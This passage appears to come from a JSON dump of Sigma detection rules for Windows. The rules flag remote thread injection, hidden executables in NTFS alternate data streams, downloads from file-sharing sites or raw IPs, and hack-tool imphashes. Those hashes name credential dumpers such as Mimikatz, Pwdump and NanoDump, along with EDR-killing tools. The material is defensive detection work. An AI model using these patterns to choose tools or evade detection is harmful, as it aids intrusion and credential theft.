- 'C:\\Windows\\System32\\dwm.exe'\n            - 'C:\\Windows\\System32\\fontdrvhost.exe'\n            - 'C:\\Windows\\System32\\userinit.exe'\n    filter_main_winlogon_2:\n        SourceImage: 'C:\\Windows\\System32\\winlogon.exe'\n        TargetParentProcessId: 4\n    filter_main_schtasks_conhost:\n        SourceImage:\n            - 'C:\\Windows\\System32\\schtasks.exe'\n            - 'C:\\Windows\\SysWOW64\\schtasks.exe'\n        TargetImage: 'C:\\Windows\\System32\\conhost.exe'\n    filter_main_explorer:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|startswith:\n            - 
'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_system:\n        TargetImage: 'System'\n    filter_main_msiexec_1:\n        # Note: MSI installers will trigger this\n        SourceImage|endswith: '\\msiexec.exe'\n        TargetImage|contains:\n            - '\\AppData\\Local\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\' # C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\n    filter_main_msiexec_2:\n        SourceImage|endswith: '\\msiexec.exe'\n        TargetImage:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_main_iexplore:\n        SourceImage: 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n        TargetImage:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n    filter_main_powerpnt:\n        SourceImage|endswith: '\\POWERPNT.EXE'\n        TargetImage|contains:\n            - 'C:\\Program Files\\Microsoft Office\\' # C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\AI\\ai.exe\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n    filter_optional_aurora_smartconsole1:\n        SourceImage: 'C:\\Program Files\\internet explorer\\iexplore.exe'\n        SourceCommandLine|contains|all:\n            - 'https://'\n            - '.checkpoint.com/documents/'\n            - 'SmartConsole_OLH/'\n            - 'default.htm#cshid='\n    filter_optional_aurora_smartconsole2:\n        SourceImage: 'C:\\Program Files\\internet explorer\\iexplore.exe'\n        SourceParentImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        SourceParentImage|contains|all:\n            - 
'\\CheckPoint\\SmartConsole\\'\n            - '\\SmartConsole.exe'\n    filter_optional_powerpnt:\n        # Raised by the following issue: https://github.com/SigmaHQ/sigma/issues/2479\n        SourceImage|contains: '\\Microsoft Office\\'\n        SourceImage|endswith: '\\POWERPNT.EXE'\n        TargetImage: 'C:\\Windows\\System32\\csrss.exe'\n    filter_main_null:\n        TargetImage: null\n    filter_main_empty:\n        TargetImage: ''\n    filter_optional_onedrive:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n    filter_optional_aurora:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\aurora-dashboard.exe'\n    filter_optional_officesetup:\n        SourceImage: 'C:\\Windows\\explorer.exe'\n        TargetImage|endswith: '\\OfficeSetup.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml",
    "content": "title: Remote Thread Creation In Uncommon Target Image\nid: a1a144b7-5c9b-4853-a559-2172be8d4a03\nrelated:\n    - id: f016c716-754a-467f-a39e-63c06f773987\n      type: obsolete\nstatus: test\ndescription: Detects uncommon target processes for remote thread creation\nreferences:\n    - https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-16\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.003\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\calc.exe'\n            - '\\calculator.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\ping.exe'\n            - '\\sethc.exe'\n            - '\\spoolsv.exe'\n            - '\\wordpad.exe'\n            - '\\write.exe'\n    filter_main_csrss:\n        SourceImage: 'C:\\Windows\\System32\\csrss.exe'\n    filter_main_notepad:\n        SourceImage:\n            - 'C:\\Windows\\System32\\explorer.exe'\n            - 'C:\\Windows\\System32\\OpenWith.exe'\n        TargetImage: 'C:\\Windows\\System32\\notepad.exe'\n    filter_main_sethc:\n        SourceImage: 'C:\\Windows\\System32\\AtBroker.exe'\n        TargetImage: 'C:\\Windows\\System32\\Sethc.exe'\n    filter_optional_aurora_1:\n        StartFunction: 'EtwpNotificationThread'\n    filter_optional_aurora_2:\n        SourceImage|contains: 'unknown process'\n    filter_optional_vmtoolsd:\n        SourceImage: 'C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n        StartFunction: 'GetCommandLineW'\n        TargetImage:\n            - 'C:\\Windows\\System32\\notepad.exe'\n            - 'C:\\Windows\\System32\\spoolsv.exe'\n    filter_optional_xerox_pjems:\n        SourceImage: 'C:\\Program 
Files\\Xerox\\XeroxPrintExperience\\CommonFiles\\XeroxPrintJobEventManagerService.exe'\n        StartFunction: 'LoadLibraryW'\n        TargetImage: 'C:\\Windows\\System32\\spoolsv.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml",
    "content": "title: Remote Thread Creation Ttdinject.exe Proxy\nid: c15e99a3-c474-48ab-b9a7-84549a7a9d16\nstatus: test\ndescription: Detects a remote thread creation of Ttdinject.exe used as proxy\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nauthor: frack113\ndate: 2022-05-16\nmodified: 2022-06-02\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith: '\\ttdinject.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml",
    "content": "title: Hidden Executable In NTFS Alternate Data Stream\nid: b69888d4-380c-45ce-9cf9-d9ce46e67821\nstatus: test\ndescription: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash\nreferences:\n    - https://twitter.com/0xrawsec/status/1002478725605273600?s=21\nauthor: Florian Roth (Nextron Systems), @0xrawsec\ndate: 2018-06-03\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\n    definition: 'Requirements: Sysmon or equivalent configured with Imphash logging'\ndetection:\n    selection:\n        Hash|contains: 'IMPHASH='\n    filter_main_null:\n        Hash|contains: 'IMPHASH=00000000000000000000000000000000'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml",
    "content": "title: Creation Of a Suspicious ADS File Outside a Browser Download\nid: 573df571-a223-43bc-846e-3f98da481eca\nstatus: test\ndescription: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers\nreferences:\n    - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/\nauthor: frack113\ndate: 2022-10-22\nmodified: 2023-06-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|startswith: '[ZoneTransfer]  ZoneId=3'\n        TargetFilename|endswith: ':Zone.Identifier'\n        TargetFilename|contains:\n            - '.exe'\n            - '.scr'\n            - '.bat'\n            - '.cmd'\n            - '.docx'\n            - '.hta'\n            - '.jse'\n            - '.lnk'\n            - '.pptx'\n            - '.ps'\n            - '.reg'\n            - '.sct'\n            - '.vb'\n            - '.wsc'\n            - '.wsf'\n            - '.xlsx'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n    
          - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    filter_optional_snipping_tool:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_'\n        Image|endswith: '\\SnippingTool\\SnippingTool.exe'\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Packages\\Microsoft.ScreenSketch_'\n            - '\\TempState\\Screenshot '\n        TargetFilename|endswith: '.png:Zone.Identifier'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate browsers not currently included in the filter (please add them)\n    - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml",
    "content": "title: Suspicious File Download From File Sharing Websites -  File Stream\nid: 52182dfb-afb7-41db-b4bc-5336cb29b464\nrelated:\n    - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99\n      type: similar\nstatus: test\ndescription: Detects the download of suspicious file type from a well-known file and paste sharing domain\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection_domain:\n        Contents|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            
- 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_extension:\n        TargetFilename|contains:\n            - '.cpl:Zone'\n            - '.dll:Zone'\n            - '.exe:Zone'\n            - '.hta:Zone'\n            - '.lnk:Zone'\n            - '.one:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.xll:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Some false positives might occur with binaries download via Github\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml",
    "content": "title: Unusual File Download From File Sharing Websites - File Stream\nid: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99\nrelated:\n    - id: 52182dfb-afb7-41db-b4bc-5336cb29b464\n      type: similar\nstatus: test\ndescription: Detects the download of suspicious file type from a well-known file and paste sharing domain\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection_domain:\n        Contents|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n          
  - 'workers.dev'\n    selection_extension:\n        TargetFilename|contains:\n            - '.bat:Zone'\n            - '.cmd:Zone'\n            - '.ps1:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml",
    "content": "title: HackTool Named File Stream Created\nid: 19b041f6-e583-40dc-b842-d6fa8011493f\nstatus: test\ndescription: Detects the creation of a named file stream with the imphash of a well-known hack tool\nreferences:\n    - https://github.com/gentilkiwi/mimikatz\n    - https://github.com/topotam/PetitPotam\n    - https://github.com/ohpe/juicy-potato\n    - https://github.com/antonioCoco/RoguePotato\n    - https://www.tarasco.org/security/pwdump_7/\n    - https://github.com/fortra/nanodump\n    - https://github.com/codewhitesec/HandleKatz\n    - https://github.com/xuanxuan0/DripLoader\n    - https://github.com/hfiref0x/UACME\n    - https://github.com/outflanknl/Dumpert\n    - https://github.com/wavestone-cdt/EDRSandblast\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-24\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.s0139\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\n    definition: 'Requirements: Sysmon config with Imphash logging activated'\ndetection:\n    selection:\n        Hash|contains: # Sysmon field hashes contains all types\n            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam\n            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam\n            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam\n            - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz\n            - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz\n            - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz\n            - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz\n            - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz\n            - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz\n            - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz\n            - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz\n            - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz\n            - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz\n            - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz\n            - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz\n            - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz\n            - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz\n            - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz\n            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato\n            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato\n            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG\n            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato\n            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato\n            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato\n            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato\n            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump\n            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump\n            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump\n            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump\n            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump\n            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump\n            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump\n            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump\n            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump\n            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX\n            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump\n            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump\n            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump\n            - IMPHASH=730073214094CD328547BF1F72289752 # Htran\n            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons\n            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons\n            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons\n            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons\n            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump\n            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump\n            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump\n            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump\n            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump\n            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump\n            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump\n            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump\n            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump\n            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump\n            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump\n            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump\n            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump\n            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump\n            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump\n            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump\n            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump\n            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz\n            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz\n            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader\n            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader\n            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader\n            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader\n            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump\n            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi\n            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi\n            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi\n            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi\n            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi\n            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi\n            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi\n            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi\n            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi\n            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi\n            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi\n            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE\n            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE\n            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers\n            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert\n            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert\n            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert\n            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte\n            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet\n            - IMPHASH=330768A4F172E10ACB6287B87289D83B # SharpEvtMute Hook\n            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz\n            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller\n            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller\n            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab\n            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab\n            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab\n            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia\n            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast\n            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast\n            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast\n            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast\n            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast\n            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast\n            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast\n            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml",
    "content": "title: Exports Registry Key To an Alternate Data Stream\nid: 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84\nstatus: test\ndescription: Exports the target Registry key and hides it in the specified alternate data stream.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml",
    "content": "title: Unusual File Download from Direct IP Address\nid: 025bd229-fd1f-4fdb-97ab-20006e1a5368\nstatus: test\ndescription: Detects the download of a file with a suspicious file type from a URL that uses a raw IP address instead of a hostname\nreferences:\n    - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md\n    - https://labs.withsecure.com/publications/detecting-onenote-abuse\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|re: 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        TargetFilename|contains:\n            - '.ps1:Zone'\n            - '.bat:Zone'\n            - '.exe:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.dll:Zone'\n            - '.one:Zone'\n            - '.cmd:Zone'\n            - '.hta:Zone'\n            - '.xll:Zone'\n            - '.lnk:Zone'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml",
    "content": "title: Potential Suspicious Winget Package Installation\nid: a3f5c081-e75b-43a0-9f5b-51f26fe5dba2\nstatus: test\ndescription: Detects a potentially suspicious winget package installation from a suspicious source.\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|startswith: '[ZoneTransfer]  ZoneId=3'\n        Contents|contains:\n            # Note: Add any untrusted sources that are custom to your env\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n        TargetFilename|endswith: ':Zone.Identifier'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\WinGet\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml",
    "content": "title: Potentially Suspicious File Download From ZIP TLD\nid: 0bb4bbeb-fe52-4044-b40c-430a04577ebe\nstatus: test\ndescription: Detects the download of a file with a potentially suspicious extension from a .zip top level domain.\nreferences:\n    - https://twitter.com/cyb3rops/status/1659175181695287297\n    - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|contains: '.zip/'\n        TargetFilename|contains:\n            - '.bat:Zone'\n            - '.dat:Zone'\n            - '.dll:Zone'\n            - '.doc:Zone'\n            - '.docm:Zone'\n            - '.exe:Zone'\n            - '.hta:Zone'\n            - '.pptm:Zone'\n            - '.ps1:Zone'\n            - '.rar:Zone'\n            - '.rtf:Zone'\n            - '.sct:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.ws:Zone'\n            - '.wsf:Zone'\n            - '.xll:Zone'\n            - '.xls:Zone'\n            - '.xlsm:Zone'\n            - '.zip:Zone'\n    condition: selection\nfalsepositives:\n    - Legitimate file downloads from websites and web services that use the \".zip\" top level domain.\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_anonymfiles_com.yml",
